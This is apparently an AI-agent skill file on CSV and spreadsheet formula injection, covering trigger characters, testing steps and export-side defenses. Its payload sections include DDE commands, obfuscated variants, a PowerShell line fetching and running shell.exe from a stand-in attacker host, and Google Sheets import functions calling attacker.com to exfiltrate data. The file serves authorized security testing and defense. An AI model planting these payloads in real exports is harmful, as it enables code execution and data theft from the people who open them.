SKILL.md
SKILL: CSV Formula Injection
AI LOAD INSTRUCTION: This skill covers formula/DDE-style injection in CSV and spreadsheet contexts, obfuscation, cloud-sheet primitives, and safe testing methodology. Use only where explicitly authorized; payloads that invoke local commands or remote fetches are impactful—prefer lab targets and document consent. Do not target end users without program rules allowing client-side execution tests.
0. QUICK START
Characters that may trigger formula evaluation when a cell is opened in Excel, LibreOffice Calc, or similar (often only if the cell is interpreted as a formula):
=
+
-
@Test cells may look like:
name,value
test,=1+1
test,+1+1
test,-1+1
test,@SUM(1+1)Routing note: when testing CSV exports, back-office reports, or user data opened in spreadsheets, prioritize these prefix characters.
1. DDE INJECTION (EXCEL / LIBREOFFICE)
Dynamic Data Exchange (DDE) and external call patterns historically abused in spreadsheets. Examples for controlled lab reproduction:
DDE("cmd";"/C calc";"!A0")A0@SUM(1+1)*cmd|' /C calc'!A0=2+5+cmd|' /C calc'!A0=cmd|' /C calc'!'A1'PowerShell-style chaining (lab only; replace host and payload with benign equivalents):
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A02. OBFUSCATION
Defensive parsers may strip obvious patterns; testers may try noise and spacing (still only where allowed):
AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!AExtra whitespace after =:
= cmd|'/c calc.exe'!ADispersed characters / unusual spacing (conceptual pattern—adjust per parser):
= C m D |'/c calc.exe'!Arundll32 style:
=rundll32|'URL.dll,OpenURL calc.exe'!A3. GOOGLE SHEETS
If exported data is later opened in Google Sheets, or sheets pull from untrusted CSV, these functions can cause outbound requests or cross-document data pulls:
Data exfiltration / probe (replace URL with your authorized callback):
=IMPORTXML("http://attacker.com/", "//a/@href")Other high-risk imports:
=IMPORTRANGE("spreadsheet_url", "range")
=IMPORTHTML("http://attacker.com/table", "table", 1)
=IMPORTFEED("http://attacker.com/feed.xml")
=IMPORTDATA("http://attacker.com/data.csv")Document which function executed and what network side effects occurred.
4. TESTING METHODOLOGY
- Map sinks — Any feature that emits CSV, XLSX, or tab-separated output: admin exports, audit logs, user rosters, billing reports, search results.
- Trace user-controlled fields — Profile fields, ticket titles, transaction memos, tags, filenames in ZIP exports—any column that echoes stored input.
- Inject formula prefixes — Start with benign arithmetic (
=1+1,+1+1) to detect evaluation; escalate only per rules.
- Open in target software — Match victim workflow: Excel desktop, LibreOffice, Google Sheets import, locale-specific decimal separators.
- Evidence — Screenshot/capture whether the cell shows a calculated result, a security warning, or DDE prompt; note product version.
Note: focus on the user input -> export -> opened in spreadsheet software chain.
5. DEFENSE
Application and export-layer mitigations:
- Prefix with single quote — In many spreadsheet apps, leading
'forces text interpretation:'=cmd|...displays literally.
- Prefix with tab — Some pipelines treat tab-prefixed fields as non-formula text when ingested correctly.
- Strip or neutralize leading triggers — Remove or escape leading
=,+,-,@(and Unicode lookalikes) at export time.
- CSV encoding — Use consistent quoting; validate column types; avoid passing raw formula strings into financial/reporting templates without sanitization.
- User education — Do not enable external data / DDE without policy.
Example safe export transformation (conceptual):
Input: =1+1
Output: '=1+1 OR \t=1+1 OR (empty prefix) with escaped quotes per RFC 4180Note: when correlating business exports, reports, and API export parameters, combine with injection, business-logic, and API-security skills.